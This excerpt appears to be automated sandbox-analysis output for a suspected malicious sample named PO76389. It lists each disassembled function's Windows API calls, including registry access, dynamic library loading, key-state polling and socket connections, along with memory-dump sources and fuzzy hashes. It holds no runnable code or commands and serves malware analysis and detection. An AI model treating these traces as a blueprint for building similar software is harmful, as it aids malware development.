                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$InformationVolume__swprintf
                                                    • String ID: %lu
                                                    • API String ID: 3164766367-685833217
                                                    • Opcode ID: 30fb4e6bc8d74ab055fbb01366fe74a64d15eca005a59cb3a362aa21e7bd68f6
                                                    • Instruction ID: aa709d2c785cebab923b0862c94293c1ca4177611192ac149142d575b559ec63
                                                    • Opcode Fuzzy Hash: 30fb4e6bc8d74ab055fbb01366fe74a64d15eca005a59cb3a362aa21e7bd68f6
                                                    • Instruction Fuzzy Hash: D1217F35A40108AFCB10EBA5D885EEEBBB8EF59704B10406EF509D7351D775DA05DB60
                                                    APIs
                                                      • Part of subcall function 004B7E53: _memmove.LIBCMT ref: 004B7EB9
                                                      • Part of subcall function 004ED623: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 004ED640
                                                      • Part of subcall function 004ED623: GetWindowThreadProcessId.USER32(?,00000000), ref: 004ED653
                                                      • Part of subcall function 004ED623: GetCurrentThreadId.KERNEL32 ref: 004ED65A
                                                      • Part of subcall function 004ED623: AttachThreadInput.USER32(00000000), ref: 004ED661
                                                    • GetFocus.USER32 ref: 004ED7FB
                                                      • Part of subcall function 004ED66C: GetParent.USER32(?), ref: 004ED67A
                                                    • GetClassNameW.USER32(?,?,00000100), ref: 004ED844
                                                    • EnumChildWindows.USER32(?,004ED8BA), ref: 004ED86C
                                                    • __swprintf.LIBCMT ref: 004ED886
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                    • String ID: %s%d
                                                    • API String ID: 1941087503-1110647743
                                                    • Opcode ID: 215debc76e3f10b315530130232c90eedf65d27464dbd3d222d5c5d26e27b0c7
                                                    • Instruction ID: 672c91af6b99e0f8c6f757d6da6e497e659e69b4497a94da81da966030d07919
                                                    • Opcode Fuzzy Hash: 215debc76e3f10b315530130232c90eedf65d27464dbd3d222d5c5d26e27b0c7
                                                    • Instruction Fuzzy Hash: 1F11E4719002056BDB117F629C86FEA3779AF44709F0040BAFE19AA186CBB899459B74
                                                    APIs
                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 005118E4
                                                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00511917
                                                    • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00511A3A
                                                    • CloseHandle.KERNEL32(?), ref: 00511AB0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                    • String ID:
                                                    • API String ID: 2364364464-0
                                                    • Opcode ID: 153ab45c3f0bfad5834dd5eb436583d3503e181c89a8764c0a5d741b4126bde2
                                                    • Instruction ID: 746d936ccc06fb4a327df516f2205442cf434aa423c7b1a55cdfc548e8d41e6d
                                                    • Opcode Fuzzy Hash: 153ab45c3f0bfad5834dd5eb436583d3503e181c89a8764c0a5d741b4126bde2
                                                    • Instruction Fuzzy Hash: F2818474A50204ABDF149F65C885FADBBF5BF44724F14805EF905AF382D7B8E9408B98
                                                    APIs
                                                      • Part of subcall function 004B84A6: __swprintf.LIBCMT ref: 004B84E5
                                                      • Part of subcall function 004B84A6: __itow.LIBCMT ref: 004B8519
                                                    • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 005105DF
                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0051066E
                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0051068C
                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 005106D2
                                                    • FreeLibrary.KERNEL32(00000000,00000004), ref: 005106EC
                                                      • Part of subcall function 004CF26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,004FAEA5,?,?,00000000,00000008), ref: 004CF282
                                                      • Part of subcall function 004CF26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,004FAEA5,?,?,00000000,00000008), ref: 004CF2A6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                    • String ID:
                                                    • API String ID: 327935632-0
                                                    • Opcode ID: f3c048fb28a07a1ea83f2d230d80cc7257a55eb5603172e950d11c2387799584
                                                    • Instruction ID: 0a947df72abcbd8d9afc8049353227e915023ab15842b29dde0f778ac2771222
                                                    • Opcode Fuzzy Hash: f3c048fb28a07a1ea83f2d230d80cc7257a55eb5603172e950d11c2387799584
                                                    • Instruction Fuzzy Hash: 6C518E75A002059FDB00EFA8C4909EDFBB5FF58314B1480AAE945AB391DB74ED85CBA4
                                                    APIs
                                                      • Part of subcall function 004BCAEE: _memmove.LIBCMT ref: 004BCB2F
                                                      • Part of subcall function 00513AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00512AA6,?,?), ref: 00513B0E
                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00512DE0
                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00512E1F
                                                    • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00512E66
                                                    • RegCloseKey.ADVAPI32(?,?), ref: 00512E92
                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00512E9F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                    • String ID:
                                                    • API String ID: 3440857362-0
                                                    • Opcode ID: 43a70dac8460383e9a70f11d1918175595783cd18e7ffcdc4e2c621a60c7928f
                                                    • Instruction ID: cf1cfa36ef8d88a002c7c89784322a2f338a4ac976c5048892f45e47883d7240
                                                    • Opcode Fuzzy Hash: 43a70dac8460383e9a70f11d1918175595783cd18e7ffcdc4e2c621a60c7928f
                                                    • Instruction Fuzzy Hash: 72518E31204205AFD704EF65C881EABBBF9FF88708F00491EF585872A1EB35E955DB62
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8bcf4f56960f79298b95c3d022be6f57908a229486343d3412a4fb757235507a
                                                    • Instruction ID: 0c4374ef216abe855216e27854b839bfddca5707f611650429308800829360b8
                                                    • Opcode Fuzzy Hash: 8bcf4f56960f79298b95c3d022be6f57908a229486343d3412a4fb757235507a
                                                    • Instruction Fuzzy Hash: 94412435944144AFEB20DB68DC89FE9BF79FB09320F544255F829E72D0C7729D80EAA0
                                                    APIs
                                                    • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 005017D4
                                                    • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 005017FD
                                                    • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0050183C
                                                      • Part of subcall function 004B84A6: __swprintf.LIBCMT ref: 004B84E5
                                                      • Part of subcall function 004B84A6: __itow.LIBCMT ref: 004B8519
                                                    • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00501861
                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00501869
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                    • String ID:
                                                    • API String ID: 1389676194-0
                                                    • Opcode ID: dc9a0f1a0c30cd9fafcd5ac91100d45747d4a488c76d3eb8c09d95b7261f436e
                                                    • Instruction ID: 4bdbc4669fa4da2cb42ede6a70e4dee7a169cc5ab4905f01b475f023029b6775
                                                    • Opcode Fuzzy Hash: dc9a0f1a0c30cd9fafcd5ac91100d45747d4a488c76d3eb8c09d95b7261f436e
                                                    • Instruction Fuzzy Hash: 35412935A00605EFCB01EF65C981AAEBBF5FF48314B14809AF805AB362DB35ED01DB65
                                                    APIs
                                                    • GetCursorPos.USER32(000000FF), ref: 004CB749
                                                    • ScreenToClient.USER32(00000000,000000FF), ref: 004CB766
                                                    • GetAsyncKeyState.USER32(00000001), ref: 004CB78B
                                                    • GetAsyncKeyState.USER32(00000002), ref: 004CB799
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: AsyncState$ClientCursorScreen
                                                    • String ID:
                                                    • API String ID: 4210589936-0
                                                    • Opcode ID: d1743cdaa004405cd0d33c1932ff7739e7429f34e5d0d0325057e685252d378a
                                                    • Instruction ID: e5f94dc5b858bf2ac667ee4e58fe19204a2af5f6693435fb59d08d2e39d5a33e
                                                    • Opcode Fuzzy Hash: d1743cdaa004405cd0d33c1932ff7739e7429f34e5d0d0325057e685252d378a
                                                    • Instruction Fuzzy Hash: 8541AD35504119BBDF159F64C845FEABBB8FF45324F20421AF828922D0C734AD94DBA4
                                                    APIs
                                                    • GetWindowRect.USER32(?,?), ref: 004EC156
                                                    • PostMessageW.USER32(?,00000201,00000001), ref: 004EC200
                                                    • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 004EC208
                                                    • PostMessageW.USER32(?,00000202,00000000), ref: 004EC216
                                                    • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 004EC21E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: MessagePostSleep$RectWindow
                                                    • String ID:
                                                    • API String ID: 3382505437-0
                                                    • Opcode ID: d926800c875335fc6f9eff51504ef2ac2d6d926805fa8f6df8ce4b9008d6b390
                                                    • Instruction ID: 609fdc246383ed5302b3c69415d1f8d849f61b3bfe8b2d57481308b391206149
                                                    • Opcode Fuzzy Hash: d926800c875335fc6f9eff51504ef2ac2d6d926805fa8f6df8ce4b9008d6b390
                                                    • Instruction Fuzzy Hash: 2531CE71900259EBDB04CFA9DD8DA9E7BB5EF04316F10422AF920EA2D1C7B49905DFA0
                                                    APIs
                                                    • IsWindowVisible.USER32(?), ref: 004EE9CD
                                                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 004EE9EA
                                                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004EEA22
                                                    • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 004EEA48
                                                    • _wcsstr.LIBCMT ref: 004EEA52
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                    • String ID:
                                                    • API String ID: 3902887630-0
                                                    • Opcode ID: 5ea51ce85451fc27886b44761660f0e1c81f7bb46a924d97fd87b8ad2bfcd9e3
                                                    • Instruction ID: 1cf06891a7c365938d95402f5fb9c9122f365a71e3e8d0f423d594b81aa36b48
                                                    • Opcode Fuzzy Hash: 5ea51ce85451fc27886b44761660f0e1c81f7bb46a924d97fd87b8ad2bfcd9e3
                                                    • Instruction Fuzzy Hash: 2B21D771204250BBEB159B6BEC45E7F7BE9EF45750F10803FF809CA2A1DA69DC419264
                                                    APIs
                                                      • Part of subcall function 004CAF7D: GetWindowLongW.USER32(?,000000EB), ref: 004CAF8E
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0051DCC0
                                                    • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0051DCE4
                                                    • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0051DCFC
                                                    • GetSystemMetrics.USER32(00000004), ref: 0051DD24
                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,00000000,?,0050407D,00000000), ref: 0051DD42
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Window$Long$MetricsSystem
                                                    • String ID:
                                                    • API String ID: 2294984445-0
                                                    • Opcode ID: d5f270c76b5efbe8a02d9c1e0392a4199f5837524d99adbb3902df0b64f1702c
                                                    • Instruction ID: 821347a21dd2e0b37d26c4a2b83b6bf4b79ed914e47645a8e3c175c00c934904
                                                    • Opcode Fuzzy Hash: d5f270c76b5efbe8a02d9c1e0392a4199f5837524d99adbb3902df0b64f1702c
                                                    • Instruction Fuzzy Hash: 2D210371614612AFDB204F78AC48BA63BB4FB55338F100B24F836C62E0D3709CA4DBA0
                                                    APIs
                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004ECA86
                                                      • Part of subcall function 004B7E53: _memmove.LIBCMT ref: 004B7EB9
                                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 004ECAB8
                                                    • __itow.LIBCMT ref: 004ECAD0
                                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 004ECAF6
                                                    • __itow.LIBCMT ref: 004ECB07
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$__itow$_memmove
                                                    • String ID:
                                                    • API String ID: 2983881199-0
                                                    • Opcode ID: 9879866ddcb2bcb332511f2f50bf0366c7b6883caf5b40a6faf8a13af0728b65
                                                    • Instruction ID: 348acf1fc326dc3859aa0af805d129f34d110bb455216f238b4aae547399fef8
                                                    • Opcode Fuzzy Hash: 9879866ddcb2bcb332511f2f50bf0366c7b6883caf5b40a6faf8a13af0728b65
                                                    • Instruction Fuzzy Hash: 5F212C717002447FDB20EA6B9C87FDF7A6CEF59715F00402AF905D7281D6B89D0687A9
                                                    APIs
                                                      • Part of subcall function 004B3B1E: _wcsncpy.LIBCMT ref: 004B3B32
                                                    • GetFileAttributesW.KERNEL32(?,?,00000000), ref: 004F6DBA
                                                    • GetLastError.KERNEL32 ref: 004F6DC5
                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 004F6DD9
                                                    • _wcsrchr.LIBCMT ref: 004F6DFB
                                                      • Part of subcall function 004F6D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 004F6E31
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                                    • String ID:
                                                    • API String ID: 3633006590-0
                                                    • Opcode ID: 3de63168f6e049903cc42754fc2e1d78db2f65216c590f3faf10944f799b436d
                                                    • Instruction ID: 747b08839da49f771d1f47035b043c7f4d8dcd5bee30761be3276dc8c1eca79e
                                                    • Opcode Fuzzy Hash: 3de63168f6e049903cc42754fc2e1d78db2f65216c590f3faf10944f799b436d
                                                    • Instruction Fuzzy Hash: 1121D86960531C96DB106775EC5AAFB336CDF11310F21055BE621C32D2EB28CD84966D
                                                    APIs
                                                      • Part of subcall function 0050ACD3: inet_addr.WS2_32(00000000), ref: 0050ACF5
                                                    • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00509160
                                                    • WSAGetLastError.WS2_32(00000000), ref: 0050916F
                                                    • connect.WS2_32(00000000,?,00000010), ref: 0050918B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: ErrorLastconnectinet_addrsocket
                                                    • String ID:
                                                    • API String ID: 3701255441-0
                                                    • Opcode ID: ad2aa780ce8da904afa3015b1d2038b3cc90a2e558009560c2de491fff7563ab
                                                    • Instruction ID: 8e544329d6002e1df66601336b7fe9606a518ad35fab4d1356e39af2fb143a84
                                                    • Opcode Fuzzy Hash: ad2aa780ce8da904afa3015b1d2038b3cc90a2e558009560c2de491fff7563ab
                                                    • Instruction Fuzzy Hash: FD2181353002119FDB00AF69DC89B6E77B9EF84724F04441DF9169B3D2DA74AC05D761
                                                    APIs
                                                    • IsWindow.USER32(00000000), ref: 005089CE
                                                    • GetForegroundWindow.USER32 ref: 005089E5
                                                    • GetDC.USER32(00000000), ref: 00508A21
                                                    • GetPixel.GDI32(00000000,?,00000003), ref: 00508A2D
                                                    • ReleaseDC.USER32(00000000,00000003), ref: 00508A68
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
